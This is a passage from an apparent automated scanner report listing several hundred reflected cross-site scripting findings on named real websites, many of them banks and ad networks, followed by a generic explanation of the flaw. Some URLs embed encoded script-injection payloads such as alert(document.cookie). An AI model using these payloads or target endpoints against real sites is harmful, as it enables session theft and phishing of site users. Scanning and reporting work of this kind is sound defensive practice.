1.361. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/ [REST URL parameter 5]

1.362. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/ [name of an arbitrarily supplied request parameter]

1.363. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/ [REST URL parameter 5]

1.364. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/ [name of an arbitrarily supplied request parameter]

1.365. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/ [REST URL parameter 5]

1.366. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/ [name of an arbitrarily supplied request parameter]

1.367. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/ [REST URL parameter 5]

1.368. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/ [name of an arbitrarily supplied request parameter]

1.369. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/ [REST URL parameter 5]

1.370. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/ [name of an arbitrarily supplied request parameter]

1.371. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/ [REST URL parameter 5]

1.372. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/ [name of an arbitrarily supplied request parameter]

1.373. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/ [REST URL parameter 5]

1.374. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/ [name of an arbitrarily supplied request parameter]

1.375. http://mortgage.ocregister.com/2011/02/ [REST URL parameter 1]

1.376. http://mortgage.ocregister.com/2011/02/ [REST URL parameter 2]

1.377. http://mortgage.ocregister.com/2011/02/ [name of an arbitrarily supplied request parameter]

1.378. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/ [REST URL parameter 5]

1.379. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/ [name of an arbitrarily supplied request parameter]

1.380. http://mortgage.ocregister.com/44146092a8373b49c062f68d9825aa14.css [REST URL parameter 1]

1.381. http://mortgage.ocregister.com/css/print.css [REST URL parameter 1]

1.382. http://mortgage.ocregister.com/css/print.css [REST URL parameter 2]

1.383. http://mortgage.ocregister.com/feed/ [REST URL parameter 1]

1.384. http://mortgage.ocregister.com/feeda71cd">1f35e8c0ea2/feed/ [REST URL parameter 3]

1.388. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [REST URL parameter 1]

1.389. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [name of an arbitrarily supplied request parameter]

1.390. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [REST URL parameter 1]

1.391. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [name of an arbitrarily supplied request parameter]

1.392. http://mortgage.ocregister.com/files [REST URL parameter 1]

1.393. http://mortgage.ocregister.com/files [name of an arbitrarily supplied request parameter]

1.394. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 1]

1.395. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 2]

1.396. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 3]

1.397. http://mortgage.ocregister.com/wp-content/plugins/democracy/basic.css [REST URL parameter 1]

1.398. http://mortgage.ocregister.com/wp-content/plugins/democracy/democracy.js [REST URL parameter 1]

1.399. http://mortgage.ocregister.com/wp-content/plugins/democracy/style.css [REST URL parameter 1]

1.400. http://mortgage.ocregister.com/wp-content/themes/onSet/style.css [REST URL parameter 1]

1.401. http://mortgage.ocregister.com/wp-includes/js/swfobject.js [REST URL parameter 1]

1.402. http://mortgage.ocregister.com/wp-includes/wlwmanifest.xml [REST URL parameter 1]

1.403. http://mortgage.ocregister.com/xmlrpc.php [REST URL parameter 1]

1.404. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [lang parameter]

1.405. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [logo parameter]

1.406. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [metric parameter]

1.407. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [partner parameter]

1.408. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [tStyle parameter]

1.409. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [target parameter]

1.410. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [theme parameter]

1.411. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [zipcode parameter]

1.412. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [REST URL parameter 5]

1.413. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [name of an arbitrarily supplied request parameter]

1.414. http://offers.amexnetwork.com/portalext/inline/back_support_mock_ie.jsp [name of an arbitrarily supplied request parameter]

1.415. http://offers.amexnetwork.com/selects/us/grid [categoryPath parameter]

1.416. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]

1.417. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]

1.418. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]

1.419. http://onlinecheckingsbanking.com/ [adid parameter]

1.420. http://onlinecheckingsbanking.com/ [keyword parameter]

1.421. http://onlinecheckingsbanking.com/ [name of an arbitrarily supplied request parameter]

1.422. http://peoplesbank.com/search.php [term parameter]

1.423. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

1.424. http://pluck.local.com/ver1.0/daapi2.api [jpcb parameter]

1.425. http://pluck.local.com/ver1.0/daapi2.api [jpctx parameter]

1.426. http://pluckit.demandmedia.com/requests [apiKey parameter]

1.427. http://pluckit.demandmedia.com/requests [jsonpCallback parameter]

1.428. http://pluckit.demandmedia.com/requests [jsonpContext parameter]

1.429. http://r.turn.com/server/pixel.htm [fpid parameter]

1.430. http://r.turn.com/server/pixel.htm [sp parameter]

1.431. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]

1.432. http://smm.sitescout.com/tag.jsp [h parameter]

1.433. http://smm.sitescout.com/tag.jsp [pid parameter]

1.434. http://smm.sitescout.com/tag.jsp [w parameter]

1.435. http://thestreet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

1.436. http://thestreet.us.intellitxt.com/v3/door.jsp [sest parameter]

1.437. http://weather.weatherbug.com/ [zcode parameter]

1.438. http://weather.weatherbug.com/ [zcode parameter]

1.439. http://weather.weatherbug.com/ [zcode parameter]

1.440. http://weather.weatherbug.com/ [zcode parameter]

1.441. http://www.bbt.com/bbt/Business/Products/ [name of an arbitrarily supplied request parameter]

1.442. http://www.bbt.com/bbt/Personal/Products/ [name of an arbitrarily supplied request parameter]

1.443. http://www.bbt.com/bbt/about/ [name of an arbitrarily supplied request parameter]

1.444. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [name of an arbitrarily supplied request parameter]

1.445. http://www.bbt.com/bbt/careers/ [name of an arbitrarily supplied request parameter]

1.446. http://www.bbt.com/bbt/mobile/mobile-product.html [name of an arbitrarily supplied request parameter]

1.447. http://www.bbt.com/bbt/personal/products/checkcard/default.html [name of an arbitrarily supplied request parameter]

1.448. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [name of an arbitrarily supplied request parameter]

1.449. http://www.bbt.com/bbt/sitemap.html [name of an arbitrarily supplied request parameter]

1.450. https://www.bbt.com/images/chat/ [name of an arbitrarily supplied request parameter]

1.451. https://www.bbt.com/images/chat/oao-matrix/ [name of an arbitrarily supplied request parameter]

1.452. https://www.bbt.com/images/chat/oao/ [name of an arbitrarily supplied request parameter]

1.453. https://www.bbt.com/images/chat/vcsp/ [name of an arbitrarily supplied request parameter]

1.454. http://www.brothercake.com/ [name of an arbitrarily supplied request parameter]

1.455. http://www.local.com/dart/ [cat parameter]

1.456. http://www.local.com/dart/ [cat parameter]

1.457. http://www.local.com/dart/ [css parameter]

1.458. http://www.local.com/dart/ [l parameter]

1.459. http://www.local.com/dart/ [l parameter]

1.460. http://www.local.com/dart/ [ord parameter]

1.461. http://www.local.com/dart/ [ord parameter]

1.462. http://www.local.com/dart/ [p parameter]

1.463. http://www.local.com/dart/ [p parameter]

1.464. http://www.local.com/dart/ [pos parameter]

1.465. http://www.local.com/dart/ [pos parameter]

1.466. http://www.local.com/dart/ [sz parameter]

1.467. http://www.local.com/dart/ [sz parameter]

1.468. http://www.local.com/dart/ [t parameter]

1.469. http://www.local.com/dart/ [t parameter]

1.470. http://www.local.com/dart/ [zone parameter]

1.471. http://www.local.com/dart/ [zone parameter]

1.472. http://www.local.com/events/category/music/dallas-tx.aspx [name of an arbitrarily supplied request parameter]

1.473. http://www.local.com/events/category/performing-arts/dallas-tx.aspx [name of an arbitrarily supplied request parameter]

1.474. http://www.local.com/events/category/sports/dallas-tx.aspx [name of an arbitrarily supplied request parameter]

1.475. http://www.local.com/results.aspx [cid parameter]

1.476. http://www.local.com/results.aspx [cid parameter]

1.477. http://www.local.com/results.aspx [client parameter]

1.478. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]

1.479. http://www.local.com/topics/ [keyword parameter]

1.480. http://www.local.com/ver1.0/Direct/Jsonp [cb parameter]

1.481. http://www.local.com/ver1.0/ReviewPage.app [articleKey parameter]

1.482. http://www.myfinances.com/ [name of an arbitrarily supplied request parameter]

1.483. http://www.myfinances.com/blog.html [name of an arbitrarily supplied request parameter]

1.484. http://www.myfinances.com/blog.html [page parameter]

1.485. http://www.myfinances.com/blog/3171093.html [name of an arbitrarily supplied request parameter]

1.486. http://www.myfinances.com/blog/3171103.html [name of an arbitrarily supplied request parameter]

1.487. http://www.myfinances.com/blog/3227953.html [name of an arbitrarily supplied request parameter]

1.488. http://www.myfinances.com/blog/3227963.html [name of an arbitrarily supplied request parameter]

1.489. http://www.myfinances.com/blog/3241183.html [name of an arbitrarily supplied request parameter]

1.490. http://www.myfinances.com/blog/3241193.html [name of an arbitrarily supplied request parameter]

1.491. http://www.myfinances.com/blog/3299523.html [name of an arbitrarily supplied request parameter]

1.492. http://www.myfinances.com/blog/3299533.html [name of an arbitrarily supplied request parameter]

1.493. http://www.myfinances.com/blog/3299543.html [name of an arbitrarily supplied request parameter]

1.494. http://www.myfinances.com/blog/3299553.html [name of an arbitrarily supplied request parameter]

1.495. http://www.myfinances.com/budget.php [name of an arbitrarily supplied request parameter]

1.496. http://www.myfinances.com/budget.php [query parameter]

1.497. http://www.myfinances.com/budget.php [query parameter]

1.498. http://www.myfinances.com/contact.html [name of an arbitrarily supplied request parameter]

1.499. http://www.openforum.com/ [name of an arbitrarily supplied request parameter]

1.500. https://www.openforum.com/ [cid parameter]

1.501. https://www.openforum.com/ [inav parameter]

1.502. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]

1.503. http://www.supermedia.com/business-listings [campaignId parameter]

1.504. http://www.supermedia.com/business-listings [tsrc parameter]

1.505. http://www.supermedia.com/business-listings/business-profile [&tsrc parameter]

1.506. http://www.supermedia.com/business-listings/business-profile [campaignId parameter]

1.507. http://www.supermedia.com/business-listings/business-profile [campaignId parameter]

1.508. http://www.supermedia.com/online-advertising [campaignId parameter]

1.509. http://www.supermedia.com/online-advertising [tsrc parameter]

1.510. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.511. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.512. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.513. http://www.superpages.com/bp/Facebook [REST URL parameter 2]

1.514. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [PGID parameter]

1.515. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 2]

1.516. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 3]

1.517. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]

1.518. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]

1.519. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [TR parameter]

1.520. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [bidType parameter]

1.521. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [lbp parameter]

1.522. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [name of an arbitrarily supplied request parameter]

1.523. http://www.superpages.com/bp/xmlproxy [REST URL parameter 2]

1.524. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]

1.525. http://www.superpages.com/inc/social/sln.php [REST URL parameter 3]

1.526. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]

1.527. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]

1.528. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]

1.529. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]

1.530. http://www.thehealthreport.net/ac-usap.php [sub parameter]

1.531. http://www.us.hsbc.com/1/2/3 [hp_pref parameter]

1.532. http://www.us.hsbc.com/1/2/3/hsbcpremier/apply [code parameter]

1.533. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

1.534. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

1.535. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

1.536. http://www201.americanexpress.com/business-credit-cards/ [inav parameter]

1.537. http://www201.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]

1.538. http://www201.americanexpress.com/business-credit-cards/ [view-all-business-cards&inav parameter]

1.539. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]

1.540. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]

1.541. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]

1.542. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]

1.543. http://www201.americanexpress.com/getthecard/home [sj_tabToOpen parameter]

1.544. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 1]

1.545. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 2]

1.546. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 3]

1.547. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 1]

1.548. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 2]

1.549. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 3]

1.550. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 1]

1.551. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 2]

1.552. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 3]

1.553. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 1]

1.554. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 2]

1.555. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 3]

1.556. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 1]

1.557. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 2]

1.558. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 3]

1.559. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 1]

1.560. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 2]

1.561. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 3]

1.562. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 1]

1.563. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 2]

1.564. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 1]

1.565. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 2]

1.566. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 3]

1.567. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 1]

1.568. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 2]

1.569. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 3]

1.570. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 1]

1.571. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 2]

1.572. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 3]

1.573. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 1]

1.574. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 2]

1.575. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 3]

1.576. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 1]

1.577. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 2]

1.578. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 3]

1.579. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 1]

1.580. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 2]

1.581. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 3]

1.582. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 1]

1.583. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 2]

1.584. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 3]

1.585. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 1]

1.586. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 2]

1.587. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 3]

1.588. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 1]

1.589. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 2]

1.590. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 3]

1.591. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 1]

1.592. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 2]

1.593. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 3]

1.594. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 1]

1.595. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 2]

1.596. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 3]

1.597. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 1]

1.598. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 2]

1.599. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 3]

1.600. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 1]

1.601. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 2]

1.602. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 3]

1.603. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 1]

1.604. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 2]

1.605. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 3]

1.606. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 1]

1.607. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 2]

1.608. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 3]

1.609. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 1]

1.610. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 2]

1.611. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 3]

1.612. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 1]

1.613. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 2]

1.614. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 3]

1.615. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 1]

1.616. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 2]

1.617. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 3]

1.618. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 1]

1.619. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 2]

1.620. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 3]

1.621. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 1]

1.622. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 2]

1.623. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 3]

1.624. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 1]

1.625. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 2]

1.626. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 3]

1.627. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 1]

1.628. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 2]

1.629. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 3]

1.630. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 1]

1.631. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 2]

1.632. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 3]

1.633. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 1]

1.634. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 2]

1.635. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 3]

1.636. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 1]

1.637. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 2]

1.638. http://yellowpages.superpages.com/listings.jsp [C parameter]

1.639. http://yellowpages.superpages.com/listings.jsp [C parameter]

1.640. http://yellowpages.superpages.com/listings.jsp [REST URL parameter 1]

1.641. http://yellowpages.superpages.com/listings.jsp [name of an arbitrarily supplied request parameter]

1.642. http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp [REST URL parameter 1]

1.643. http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp [REST URL parameter 2]

1.644. http://yellowpages.superpages.com/profile.jsp [LID%3D parameter]

1.645. http://yellowpages.superpages.com/profile.jsp [REST URL parameter 1]

1.646. http://yellowpages.superpages.com/profile.jsp [name of an arbitrarily supplied request parameter]

1.647. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 1]

1.648. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 2]

1.649. http://yellowpages.superpages.com/profiler/abook.jsp [couponsLoc parameter]

1.650. http://yellowpages.superpages.com/profiler/abook.jsp [requestAction parameter]

1.651. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 1]

1.652. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 2]

1.653. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 3]

1.654. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 1]

1.655. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 2]

1.656. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 3]

1.657. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 1]

1.658. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 2]

1.659. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 1]

1.660. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 2]

1.661. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 3]

1.662. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 1]

1.663. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 2]

1.664. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 3]

1.665. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

1.666. http://www.accuweather.com/index-radar.asp [Referer HTTP header]

1.667. http://www.accuweather.com/maps-satellite.asp [Referer HTTP header]

1.668. http://www.experts123.com/q/general-mortgage-information-what-is-a-mortgage-828301.html [Referer HTTP header]

1.669. http://www.experts123.com/q/general-mortgage-information-what-is-a-mortgage-828301.html [Referer HTTP header]

1.670. http://www.experts123.com/q/how-are-mortgage-properties-registered.html [Referer HTTP header]

1.671. http://www.experts123.com/q/how-are-mortgage-properties-registered.html [Referer HTTP header]

1.672. http://www.experts123.com/q/what's-the-best-checking-account-for-me.html [Referer HTTP header]

1.673. http://www.experts123.com/q/what's-the-best-checking-account-for-me.html [Referer HTTP header]

1.674. http://www.experts123.com/q/what-is-a-checking-account-limit.html [Referer HTTP header]

1.675. http://www.experts123.com/q/what-is-a-checking-account-limit.html [Referer HTTP header]

1.676. http://www.experts123.com/q/what-is-a-commercial-mortgage-lender.html [Referer HTTP header]

1.677. http://www.experts123.com/q/what-is-a-commercial-mortgage-lender.html [Referer HTTP header]

1.678. http://www.experts123.com/q/what-is-a-mortgage-lender.html [Referer HTTP header]

1.679. http://www.experts123.com/q/what-is-a-mortgage-lender.html [Referer HTTP header]

1.680. http://www.experts123.com/q/what-is-a-mortgage.html [Referer HTTP header]

1.681. http://www.experts123.com/q/what-is-a-mortgage.html [Referer HTTP header]

1.682. http://www.experts123.com/q/what-is-an-online-checking-account.html [Referer HTTP header]

1.683. http://www.experts123.com/q/what-is-an-online-checking-account.html [Referer HTTP header]

1.684. http://www.experts123.com/q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html [Referer HTTP header]

1.685. http://www.experts123.com/q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html [Referer HTTP header]

1.686. http://www.experts123.com/q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html [Referer HTTP header]

1.687. http://www.experts123.com/q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html [Referer HTTP header]

1.688. http://www.experts123.com/questions/ask [Referer HTTP header]

1.689. http://www.experts123.com/questions/filter/bank [Referer HTTP header]

1.690. http://www.supermedia.com/spportal/404.jsp [Referer HTTP header]

1.691. http://www.supermedia.com/spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif [Referer HTTP header]

1.692. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

1.693. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [User-Agent HTTP header]

1.694. http://www.us.hsbc.com/1/2/3 [Referer HTTP header]

1.695. http://bh.contextweb.com/bh/sync/admeld [V cookie]

1.696. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

1.697. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

1.698. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [ZEDOIDA cookie]

1.699. http://da.newstogram.com/hg.php [DMUserTrack cookie]

1.700. http://gsbmtg.rtrk.com/ [RlocalUID cookie]

1.701. http://optimized-by.rubiconproject.com/a/6272/9319/15153-15.js [ruid cookie]

1.702. http://optimized-by.rubiconproject.com/a/6272/9319/15153-2.js [ruid cookie]

1.703. http://porscheusa.com/911GTS-mosaic [REST URL parameter 1]

1.704. http://porscheusa.com/911GTS-mosaic [name of an arbitrarily supplied request parameter]

1.705. http://s1.srtk.net/www/delivery/rd.php [trackerid parameter]

1.706. http://www.feedzilla.com/rss/flash_feed.asp [Cat2 parameter]

1.707. http://www.feedzilla.com/rss/flash_feed.asp [cat parameter]



1. Cross-site scripting (reflected)
There are 707 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

